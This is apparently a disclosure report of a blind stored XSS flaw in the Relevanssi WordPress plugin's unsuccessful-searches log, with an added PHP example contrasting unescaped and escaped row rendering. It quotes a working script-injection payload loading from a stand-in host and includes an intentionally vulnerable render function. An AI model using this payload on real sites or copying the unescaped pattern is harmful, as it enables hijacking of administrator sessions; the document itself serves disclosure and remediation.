Good afternoon. Beginning on 12 October 2021, our XSS catcher started receiving callbacks from a group of sites that are using the Relevanssi plugin for WordPress. It appears to us that the software is not properly filtering Unsuccessful searches before displaying the information to the user. One of the sites that we received a blind stored XSS callback from is an offshore private bank.
Our payload was sent via the website's search form and was formatted like so: foo"><script src=//xss></script><x="
, which was displayed to the users of your plug-in like so:
<td>foo"><script src="//xss"></script><x=" <a="" href="https://website/?s=foo%22%3E%3Cscript%20src%3D%2F%2Fxss%3E%3C%2Fscript%3E%3Cx%3D%22"><span></span></x="></td>
<td style="padding: 3px 5px; text-align: center">2</td>
This flaw allows attackers to pass rogue JavaScript to unsuspecting users; here the victim is whoever views the plugin's search log, normally a site administrator. Since the user's browser has no way to know the script should not be trusted, it will execute the script, which can then access any cookies, session tokens, or other sensitive information retained by the browser and used with your website (cookies flagged HttpOnly cannot be read directly, but the script can still issue authenticated requests as the victim, which for a WordPress administrator means any action available in wp-admin). In fact, here is a list of 21 other things that hackers can do with an XSS flaw: https://s0md3v.github.io/21-things-xss/
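As an added illustration, not part of the report above and not Relevanssi's own code, the following PHP shows a minimal rendering of one "unsuccessful searches" row in the unescaped form that produces the markup quoted in the report, beside the hardened form using WordPress's esc_html()/esc_url() escaping functions. The row layout, the function names render_row_vulnerable/render_row_hardened and the site URL are assumptions for the example; the local fallbacks for the WordPress escaping functions are approximations so that the file runs under plain `php` outside WordPress.

```php
<?php
// Added example, not Relevanssi's code. WordPress provides esc_html(),
// esc_attr() and esc_url(); the fallbacks below approximate them with
// htmlspecialchars() so this file runs outside WordPress.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    function esc_url($url) {
        return htmlspecialchars((string) $url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable: the stored search term is concatenated straight into the
// table cell as text. A term containing "> ends the text and the browser
// parses the remainder as markup, which is exactly the DOM shown above.
function render_row_vulnerable(string $query, int $count, string $site): string {
    $url = $site . '/?s=' . rawurlencode($query);
    return '<td>' . $query . ' <a href="' . $url . '"><span></span></a></td>'
         . '<td style="padding: 3px 5px; text-align: center">' . $count . '</td>';
}

// Hardened: escape for the context the value lands in. The visible term
// gets esc_html() (text context); the link gets rawurlencode() for the
// query value and esc_url() for the attribute context; the count is cast.
function render_row_hardened(string $query, int $count, string $site): string {
    $url = $site . '/?s=' . rawurlencode($query);
    return '<td>' . esc_html($query) . ' <a href="' . esc_url($url) . '"><span></span></a></td>'
         . '<td style="padding: 3px 5px; text-align: center">' . (int) $count . '</td>';
}

// Cheap check a reviewer can run over rendered rows: does a raw <script
// start tag survive in the output?
function contains_live_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

// The payload from the report, exactly as submitted to the search form.
$payload = 'foo"><script src=//xss></script><x="';

$vuln = render_row_vulnerable($payload, 2, 'https://website');
$safe = render_row_hardened($payload, 2, 'https://website');

echo "vulnerable row:\n", $vuln, "\n";
echo "live script tag present: ", var_export(contains_live_script($vuln), true), "\n\n";
echo "hardened row:\n", $safe, "\n";
echo "live script tag present: ", var_export(contains_live_script($safe), true), "\n";
```

Run with `php example.php`: the vulnerable row carries the payload as a working `<script src=//xss>` element, while the hardened row renders the same stored term as literal text (`&lt;script ...&gt;`) and only the URL-encoded copy reaches the href. The point is context-specific output escaping at render time; stripping or "filtering" the term on input is not a substitute, because the search log must store what was actually searched for.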